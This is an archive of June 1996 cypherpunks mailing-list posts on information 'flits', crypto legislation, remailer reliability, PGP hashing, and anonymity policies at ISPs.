I think we're too far from the limit to even begin to guess about how
information would be stored in such a medium.    But that's just my
thought.  For the sake of argument: why would we want to have this
level of complexity in a simulated world.  There is so much that can be
assumed that is repetative and wasteful in the real world, why would we
want a computer-generated system that must keep track of all this
waste?

>>I think the thing that's most important in this sentence is _"move"_ ... 
>>this is the main problem for computers... it's SO easy to DUPLICATE 
>>information... but near impossible to make sure that you've MOVED it... 
>
>indeed, the concept of "moving" information implies TIME-- at one
>time, it is at one place, at another time, it is in a new place.
>but it is the SAME INFO. today, the disconnected idea of a "bit"
>does not give you this *continuity*. I make a copy somewhere else
>that is not tied to the original document.

That's why it's so easy to make a copy...  that's why we can have
backups and the cypherpunks list and almost everything on the Net.  If
we had to keep track of flits and update them constantly, things would
slow down a lot... but you're compensating for that by having
arbritarbily advanced computer technology.

>imagine the same thing on a totally universal cyberspatial level,
>not merely within a single company or university. I agree, we have
>rudiments of what I'm talking about in place. but my point is
>mainly that they are rudiments compared to what is possible. the
>web is a very good sample framework for the kind of seamlessness
>I'm talking about. like I say, the future information assembly
>line will be built on top of it. it has a long ways to go too.

Ok... in a far advanced level of technology, this and more would be
possible... but, the question is: do we need it?

>in a sense, I think the flit concept is a magic bridge between bits
>and atoms. bits are too abstract. atoms are too real. flits are
>a nice compromise. we have to get our bits to behave more like
>atoms: persistence, etc.  there are a whole lot of very nice
>"properties" of atoms that are staring us in the face that we
>would benefit from immensely implementing in cyberspace.

For some reason, distributed objects come to mind... though I'm not
knowledgeable enough on the subject to know why...

>>It means that you'd have an INSANELY large ammount of storage for a 
>>single small document.
>
>early stages would not be much different than RCS systems already in
>use in companies.

But I think that this is the best system available for today's or the
future's needs... if we extended this concept to document fragments
(ie, if you use a quote from a document, that section of your document
has the same revision history, changed as necessary), then we have a
system that could be in use for a long time.

>you could have mechanisms that don't keep the entire history of the
>flit. I agree, a flit as a 0 or 1 is very unlikely in the near future.
>but at a document level, i.e. a document as a flit, we already have
>it in RCS systems that companies are struggling to implement well
>as we speak.

Again, I think a document system is the best suited for information
storage... the flit concept seems to be a great overkill.

>I'm saying that in the information assembly line of the future,
>they *must* have context. they must be tied together. you only
>have disconnected chaos otherwise.

Hmm... the only problem is that the "context" would be completely
machine enforced... you can't actually MOVE or COPY the bits off a
computer onto another computer... each side just would have to
intrepret the bits as being moved or copied... and unless you propose
storing flits in something other than bits, the disconnected chaos you
refer to is nothing other than software understanding bit patterns...
same as ASCII or a word processor file or an OpenDoc document.

>again, this requires the human to interpret the changes. what if
>there was an actual "link" between the old and the new document
>that is "stuck" to the new document? and furthermore, software
>could traverse these links? that's more what I have in mind.

And if the old document moved?  How would the new document continue to
know where the old document is?

>data doesn't have to be disconnected. I told you this was a radical
>paradigm shift that I was proposing. you obviously have the previous
>concepts down quite well. I'm not arguing that what you are saying
>is the conventional system. I pointed out exactly that.

*nod*  You're right... I don't understand your shift in thinking... it
doesn't make sense to me.  I think that conventional systems are very
well suited to information creation, retrieval and transport, and that
virtual reality, though still in development, wouldn't benefit from the
flit concept.

>>But cyberspace is NOT real space...
>
>it will evolve to become more and more like a real space, a point
>of my essay.

I sure hope not... why do you think so many people escape to muds...
real space is bad... virtual space has the potential to become so much
more.

>>VERY VERY VERY far...
>
>10 years or so, I would say, before people implement things that
>sound like they came right out of what I was talking about.

Perhaps... I hope not, because I don't think that it's a reasonable
concept for working with data in an on-line or even mostly digital
environment, but perhaps...

>right. I think it is much more realistic to speculate that we will
>be virtually unlimited than limited, and to ask the question, 
>what would we implement if we truly were unlimited? to build something
>limited when you are unlimited shows an impoverished imagination.

well... I'll continue to think about the present, and you can continue
to dream about the future....

Take care,
Josh

PS I wonder: do you envision flits being able to be created out of thin
(virtual) air?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 25 Jun 1996 09:54:14 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
Message-ID: <199606240714.AAA13614@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 AM 6/22/96 -0700, someone anonymous wrote:

>Don't confuse Kerry and Kerrey.  This was not Kerry from
>Massachusetts.

Kerry from Mass seemed to have mixed feelings about it.
One one hand, he wants more business for his state, but on the
other, he's got a military background and is concerned about the
so-called legitimate needs of law enforcement.


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Tue, 25 Jun 1996 08:20:38 +0800
To: cypherpunks@toad.com
Subject: The Reno Text.....
Message-ID: <2.2.16.19960624053327.12e75b32@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I read the Reno text from John Young's site.

Now not wanting to get into technical details,
It sure seemed kinda chilling to me.

The first "loaded word" she used was 'consensus'.
And from there on in, it was all downhill.

I would suggest that you read it.

Love Always

Carol Anne
Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Mon, 24 Jun 1996 13:51:24 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Auto-mail filters and penet-remiler loophole?
In-Reply-To: <199606232055.QAA02670@unix.asb.com>
Message-ID: <Pine.SUN.3.94.960624012258.6339C-100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 23 Jun 1996, Deranged Mutant wrote:

> Date: Sun, 23 Jun 1996 16:49:07 +0000

> Seems someone sent a message to my frienly-mailer filter using penet 

	If you are using procmail, then what you want is a recipes
	at the begining like this:


	LOG=penet$NL
	:1hW:
 	^From.*.penet.fi
	.mailbox/penet

	Respond to the penet.fi messages as you wish.
	Alternatively, you can just send the message to /dev/null

	That recipe hasn't been tested, so it may need some tweeking
	on it.

        xan

        jonathon
        grafolog@netcom.com



	NETCOM --- when only the worst in internet service will suffice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@wero.cs.byu.edu>
Date: Tue, 25 Jun 1996 10:29:12 +0800
To: cypherpunks@toad.com
Subject: uh... HELLO?? Was Re: Auto-mail filters and penet-remiler loophole?
In-Reply-To: <Pine.LNX.3.94.960623203411.135A-100000@gak>
Message-ID: <m2n31t4p4v.fsf@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hasn't anyone here heard of penet's password system? or does your autoresponder
automatically insert your penet password into all your autoresponses???

Even if you only got your penet account on accident, you could at least read
the documentation on it.

Don
-- 
<don@cs.byu.edu> http://students.cs.byu.edu/~don  PGP 0x994B8F39  fRee cRyPTo!
  Linux was made by foreign terrorists to take money from true US companies
  like Microsoft." -Some AOL'er. "To this end we dedicate ourselves..." -Don
** This user insured by the Smith, Wesson, & Zimmermann insurance company **




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Tue, 25 Jun 1996 08:37:48 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.25 - Senate Encrypti
Message-ID: <199606240557.BAA27377@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Damn, we've been found out.

I don't suppose anyone will notice the fact that although I've
helped with the preparation for the SAFE day, I won't actually be
attending the event.

Clearly, I don't want to get caught.

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

PS On a more serious note, I can't get testimony into the record for this
hearing if you don't send it to me.  Sooo...please either fill out the
form at http://www.crypto.com/submit/ or if you find that format too
constraining, just send it to me in email.  I'll see what I can do to
make sure PGP signatures are reproduced intact in the Congressional Record.

Most everyone I know cannot simply jaunt off to D.C. for a day.  Why not
at least make your voice heard?

anonymous-remailer@shell.portal.com writes:
>WHY IS NO ONE TALKING ABOUT THIS VIOLATION OF OUR RIGHTS? EVER HERE THAT
>IN THE US VOTES ARE supposed to be *****SECRET*****??? NO MORE!
>
>Why does the vtw cdt etc want to hand over your name to the us gov? Notice
>how there's two events one on the east cost and the other on the west coast.
>Why is that? So they can get more names!
>
>Read carefully:
>
>>TELL CONGRESS WHY ENCRYPTION IS IMPORTANT TO YOU - ADD YOUR VOICE TO THE
>>CONGRESSIONAL RECORD
>>
>>Senator Burns, Senator Patrick Leahy (D-VT) and the other sponosors of the
>>Pro-CODE bill want to hear from the Net.community about why encryption is
>>important to privacy and security on the Internet.
>>
>>Please be sure to visit http://www.crypto.com/ and add your voice to the
>>debate over encryption policy on Capitol Hill.  Responses will be tabulated
>>and the results, along with selected statements, will be included in the
>>Congressional Record by Senator Conrad Burns.  The restults will also be
>>featured during the Security and Freedom through Encryption Forum (SAFE) on
>>July 1 (details on that event are attached below).
>>
>>To add your voice to the crypto debate in Congress, visit:
>>
>>   http://www.crypto.com/submit/
>>
>
>Right. Sure. And then they have a record of all the ppl interested in
>cryptoprivacy (keep reading)
>
>>ATTEND THE SAFE FORUM - JULY 1, 1996 STANFORD CALIFORNIA
>>
>>On July 1, 1996, in the heart of California's Silicon Valley at Stanford
>>University, members of Congress, prominent computer industry leaders and
>>privacy advocates will meet to discuss the need to reform U.S. encryption
>>policy.
>>
>>The event is FREE and open to the public, but space is limited and is going
>>fast.  To find out more, and to reserve your free ticket, visit the SAFE
>>Forum Web Page at:
>>
>>  http://www.crypto.com/safe/
>>
>
>And sign up for a free trip to the roundup of people who want privacy. Coming
>soon to a police state near you. WHY THE FUCK DO THEY NEED TO KNOW YOUR
>NAME FOR THIS SHIT??? WHY IS NO ONE ASKING THIS???
>
>Look carefully at who's sponsoring this. Who are they, and where does
>the money come from? Hint: three letters.
>
>Notice how they don't use PGP to sign the msg? Wonder why? What does PRZ
>say about this?
>
>Is there anyone we trust involved who can answer for this?
>
>[///// THIS LINE ADDED BY EZBBS-MAIL / DO NOT DELETE / MSGID-33f1a9 / END ////
>/]
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 25 Jun 1996 09:58:57 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: MD5 collisions
Message-ID: <199606240728.DAA02464@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


This was sent to me today.

Rob.

------- Forwarded Message Follows -------
Date:          Sun, 23 Jun 1996 20:03:16 -0400
From:          Zbigniew Fiedorowicz <fiedorow@math.ohio-state.edu>
Subject:       Re: MD5 collisions

It is very easy to add SHA1 hash capability to the existing PGP sources.
The patch is about 17K in size and there is an extra module which
actually implements SHA1. I've put this up on my web page:
 http://www.math.ohio-state.edu/~fiedorow/PGP

Zig Fiedorowicz







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 25 Jun 1996 09:57:59 +0800
To: richieb@teleport.com
Subject: Re: Zimmerman/Viacrypt
Message-ID: <199606240734.DAA02511@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Also note that "PGP" is Phil's trademark. If Viacrypt wants to market 
an 'escrowed' encryption utility that is compatabile with PGP, they 
can if they use their own code and if they don't use the trademark.

--Rob.

On 23 Jun 96 at 12:17, Rich Burroughs wrote:
[..]
> Phil's feelings about PGP are a different matter, though.  If he feels it
> shouldn't be used that way, and that Viacrypt has violated their agreement,
> then he should pursue it, IMHO.  It doesn't necessarily follow that he's
> just using it as an excuse to wrest the commercial version from them.  He
> may feel they really have gone beyond what was agreed upon.  I suppose it
> will be up to the courts to decide whether the escrow system is a "back
> door" or not.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 25 Jun 1996 13:32:56 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: info assembly line, "flits" (long)
In-Reply-To: <199606240027.RAA26443@netcom10.netcom.com>
Message-ID: <Pine.LNX.3.93.960624034918.283A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 23 Jun 1996, Vladimir Z. Nuri wrote:

> to move a pencil I only pick it up and set it down. to move a 
> document through cyberspace, 
> the process is infinitely more complex, requiring an
> immensity of thoughts and coordinated actions. when we create
> a system that matches the real-world difficulty, then we will
> be approaching the limit. we are very, very far from that limit
> even though we have climbed the ladder a long ways as you note.

	Think about catching a ball. Think about writing a program
convince a piece of hardware to catch a ball. Which is _more complex_
neither. Which is harder? writing the program.  

	Back to your example: moving a pencil up and down is not nearly as
complex as "moving" a document through "cyberspace". Then again moving a
pencil up and down isn't nearly as comlex as moving a pencil from Finland
to Miami. 

	Thing is, in the physcial world there is much complexity to what
we accomplish, it is just that we have already learned that complexity. It
is often less of a pain for me to ftp a file from a site half way around
the world that to dig thru the piles of paper to find the print out. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 25 Jun 1996 10:50:32 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: L&J: Libertarians
Message-ID: <9606240806.AA01235@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 23 Jun 96 at 22:21, s1113645@tesla.cc.uottawa.ca wrote:

> David Friedman (<http://www.best.com/~ddfr>

Thanks for the reference

> > Anybody who discuss it openly on the net and plan to implement it will
> > get killed by governments (pick your favorite one).  I find it very

> You don't see death
> squads going after old anti-government Milton Friedman, do you?

I guess I made myself misunderstood.  I meant to reply to Jim Bell 
mentionning that he would like to see some peoples interested in 
discussing the implementation of AP.  It is very different than just 
talking about (against) govt.

> No offense meant, but have a couple of Valiums, J-F. 

No. No offense meant, but you are wrong here. Did you read
Assasination Politics?  By the nature of it, govt employees will get
killed and *this* warrant trying to kill everybody they would
suspect of setting up an AP server.


> > And communicating with each other with PGP without remailers would
> > probably put us instantly on a hit list.  To quote a famous french

> Use a nym. I do.
No offense, but please, re-read the paragraph.  That is exactly what 
I meant...

 
> They already have such a thing. <snip> After all, Cypress Hill,
> Hyperreal.com, High Times and The Economist are still in business.

Did you read the AP essay?  I don't think so otherwise you wouldn't 
have commented in that sense.  What you say is true but IMO, AP is 
absolutely different from The Economist.  Remember, it entails 
asassination of govt employees...
 
> > C'Punks has a total cumulative
> > subscription of, say, 10000 (out of the blue number), which represent
> Closer to 1000. Send a "who cypherpunks" to majordomo@toad.com

I did not say "subscription", but "cumulative subscription".  I think 
that C'Punks is having around 1500 subscribers theses days.

> ;-) In the past little while 
<snip>

Interesting and good luck for the future!

> I really do think it's necessary for people to read a good book
<snip> 

wholehartedly agreed
 
> The subject of "anarchy vs. statism" doesn't really have much to do with
> politics, really. It's all economics.
<snip>

Somehow agreed.

Regards

JFA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Mansfield-Jones <strix@rust.net>
Date: Tue, 25 Jun 1996 19:39:00 +0800
To: cypherpunks@toad.com
Subject: Re: Oil Change software snoops through hard drive
In-Reply-To: <adf2d22c00021004b6d8@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.960624063035.333A-100000@neophron.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 23 Jun 1996, Timothy C. May wrote:

> At 8:31 PM 6/23/96, Alan Lewine wrote:
> >Maybe i'm confused, but oil change sounds like a mole that can burrow
> >unbidden into user's disks. I don't think user installation is required,

> It's a commercial product, offering a (putative) service to those who buy
> it. One "opts out" by not buying and installing it.

I thought Alan was implying that Oil Change might be licensed by other
software vendors, and then supplied as a "service" without warnings.
For instance, one might purchase the NiftyKeen Win95 graphics editor, 
and find in a footnote on page 58 of the manual that the product will
automatically update itself unless the user explicitly refuses the 
Customer Convenience Package during installation.

In any case, I don't think it's a bad idea to point out the potential
problems -- some people just don't notice these things unless the
implications are spelled out in at least as much detail as the glowing
marketer fluff.

  regards,
`=-`=-`=-`=-                                          -='-='-='-='
 Jennifer Mansfield-Jones   http://www.rust.net/~strix/strix.html
 strix@rust.net                            PGP key ------^


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMc5xc0xVmNNM34OxAQH2DAQAxiAj+CR7okA5nLCI54GYoESNUKO1wX8D
geD2L4UHtidJQ1dbSJmhRAggMGnHVpOH3JuPTDzSV45m+O1o8GXIuUYqGMzmiFhZ
LrDiV7l/RTWxoFPVE8M3e6BiH6IMShe3ZHXPkP4q4w0RALJMSYK0YYq3EX3ji+1B
86tpWojLRzk=
=9rDr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 25 Jun 1996 14:01:37 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199606241350.GAA17535@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 24 Jun 96 6:48:39 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
flame    remailer@flame.alias.net         ++++-+++++++    59:15 100.00%
replay   remailer@replay.com              ***+********     4:33  99.98%
alumni   hal@alumni.caltech.edu           **#+##*#####      :58  99.98%
ecafe    cpunk@remail.ecafe.org           --#+*#+####*    12:20  99.98%
vegas    remailer@vegas.gateway.com       *#*+#**#**-#    37:05  99.96%
c2       remail@c2.org                    +-+++-++++++    54:42  99.96%
portal   hfinney@shell.portal.com          ##+###+####      :58  99.86%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    40:58  99.82%
exon     remailer@remailer.nl.com         ***+*+-++***     7:09  99.81%
haystack haystack@holy.cow.net            #*-*+-+*-+#+    21:26  99.80%
nymrod   nymrod@nym.jpunix.com            *+* ***** **     8:10  99.57%
penet    anon@anon.penet.fi               .___ ____    57:56:47  99.49%
mix      mixmaster@remail.obscura.com     ++-+_.-__.-  18:28:27  99.47%
amnesia  amnesia@chardos.connix.com        ----------   3:37:36  98.99%
treehole remailer@mockingbird.alias.net   +___-+.+++    7:26:03  97.84%
extropia remail@miron.vip.best.com        ----   --.-   7:35:07  95.20%
ncognito ncognito@rigel.cyberpass.net      ..._.--.    15:50:51  93.26%
alpha    alias@alpha.c2.org                    ++*****    35:02  87.27%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 25 Jun 1996 13:10:00 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: L&J: Libertarians
In-Reply-To: <9606240806.AA01235@cti02.citenet.net>
Message-ID: <Pine.3.89.9606240829.A24595-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



May we take cypherpunks off the reply block for this thread? It's rather 
unrelated (though I have nothing against discussing the topic through 
e-mail).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 25 Jun 1996 13:34:28 +0800
To: cypherpunks@toad.com
Subject: Paranoids Day Out
Message-ID: <adf41ef400021004dab4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:57 AM 6/24/96, Shabbir J. Safdar wrote:
>Damn, we've been found out.
>
>I don't suppose anyone will notice the fact that although I've
>helped with the preparation for the SAFE day, I won't actually be
>attending the event.
>
>Clearly, I don't want to get caught.


I also signed up for this "SAFE" event, using my True Name (tm, and TM). I
feel that I can do more good for the Cause by working from within the
Reeducation Camps than I can by wandering through the No Thought Zones.

But, then, They already had my name....


>anonymous-remailer@shell.portal.com writes:
>>WHY IS NO ONE TALKING ABOUT THIS VIOLATION OF OUR RIGHTS? EVER HERE THAT
>>IN THE US VOTES ARE supposed to be *****SECRET*****??? NO MORE!
>>
>>Why does the vtw cdt etc want to hand over your name to the us gov? Notice
>>how there's two events one on the east cost and the other on the west coast.
>>Why is that? So they can get more names!
...
>>Look carefully at who's sponsoring this. Who are they, and where does
>>the money come from? Hint: three letters.

Yes, the "NSA" is indeed the TLA operating VTW. This is well-known to all
true paranoids.

--Winston Smith






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WorldNet User <anonymous-user@worldnet.att.net>
Date: Tue, 25 Jun 1996 13:19:26 +0800
To: cypherpunks@toad.com
Subject: AT&T bans anonymous messages
Message-ID: <31CEC5B3.7C19@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


AT&T WorldNet service has banned the sending of anonymous email or
posting anonymously.

>From the "AT&T WorldNet Service Operating Policies":

		(i) Members may not post or transmit any message
		anonymously or under a false name. Members may
		not permit any other person (other than an agent
		acting on Member's behalf and subject to Member's
		supervision) to access the Service Member's
		account for any purpose.

The no anon rule even beat the no indecency rule, which is second:

		(ii) Members may not post or transmit any message
                which is libelous, defamatory or which discloses
                private or personal matters concerning any person.
                Members may not post or transmit any message,
                data, image or program which is indecent, obscene
                or pornographic. 

http://www.worldnet.att.net/care/terms/#oppol




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Tue, 25 Jun 1996 13:30:57 +0800
To: cypherpunks@toad.com
Subject: Re: Bad Signatures
Message-ID: <19960624094226014.AAA227@geoff.commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Jun 24 12:48:55 1996

Thanks to all list members who responded on this issue.

The consensus is that bouncing bad signatures to the list is not a 
good idea.

In the interest of reducing the number of bad signatures caused by 
munging which appear on the list, I will continue to bounce messages 
with bad signatures to the originator only.

Thanks,

Geoff Klein.






-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMc5WeELv5OMYFK1FAQEiAAP/fr0+Z1dmGfuRgiGqir9396+DSJ+eBquS
0JM9FxtMvZwyCsafsJSwZSHBPWtLanaAzFMgO5SigWSki6hP3sP/ywrH0qni480U
7d0CG9gz2g2N6pYAjE8nhFT26NUVFBvm/csPod+3W71/vvg/KP3vRas2fWRqRzQY
wEV2g4aaTII=
=rh71
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 25 Jun 1996 13:09:20 +0800
To: cypherpunks@toad.com
Subject: private message to anonymous recipient
In-Reply-To: <199606180226.VAA19583@alpha.jpunix.com>
Message-ID: <199606241102.NAA14046@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

C'Punks, I sincerely apologize for this breach of netiquette,
but I can't figure out any other way to be sure of contacting my
interlocutors.  Please be patient with us, we'll have a better
anon channel soon.


Bryce


- -----BEGIN PGP MESSAGE-----
Version: 2.6.2i
Comment: Auto-encrypted under Unix with 'BAP' Easy-PGP v1.1b2

hIwDulymyOnirHUBBACLxoU/DOrHiwd/4eedAqcMpeVBHJskv4mcFnG97Nxll6OV
xRqNmVY7UT7HV6+8TgNsVPHtIz2gd76pT6gdscbZxFOnXNTOMR1c8kH/W0PZh8LY
kE0WxxWyqghnw4j98jMCs1al+aMSKE9CzGVPM5v3iZjTO6taOguvOFaBzDSvwYRs
A0jbHy8sKZitAQL+JDc20xS/fZPsIENngCyKcE7f8QsR85PhuQrBQeZuNsuOPU2v
5CbewkQR/+z3uzyJAfCcOUoXrPDecaMmyFYxrzjjYcjNhoxRDKEJa+X+SscvlcEp
T06KDNUZrrXDUUevhIwDkJRPiBSKEeUBBACfB3dE6Izxr3V6qfnxgE3P09Tb1hNI
30ZcahXWwWMPnkIPXOESyNbSYquV+2Inw0sSumCk7A+uwSDQEdv7T+7NxnBBO6Cx
EvUkOKIFa5ApyU38b/NjVeYK9XjOY5Zxz3smUwaRtCJwKSF/RfP/oRF465ZfiIaU
0bzo8Dx5o9H1bKYAAAHAl8upwh5wHWT+3xV89Vl0e+dsONfexbR28ON8o53gbLu1
UpgMhg3+ezSkPlaW5nXoDhME1Miwdi9/J9Rq3/CzF+jY4gus9pEobJ8MRZBLe2Lh
O1cBCDzyzSJcQdt1kbItfMfKkm2PMKHYt+SyzR1l9hHq42UBqw6qGfbj0SiQ8hWf
hwoAeL0xo2bfgwTYEX35QVc5FD5fEEAcsFOqgB/VzuxOfR9ydH1saOux8aXoF3N9
v/Y3pGMNxlAb+7NThv+Dt/GFK+3CnT9HbNE1h//SZL16THYByB1CzWqfUhrhW0XU
BfPHkReKTnei5Tc9Hblu0JrGOctIKIjZiyRIJAZzPg2zq/lVwOdB5glZRtJ0LAID
yvwODNXG71wLl2x8+jVFxCJTK5bAsQvluQXNwq8lPaDiJrBjsCWTYEbHXLnue4jO
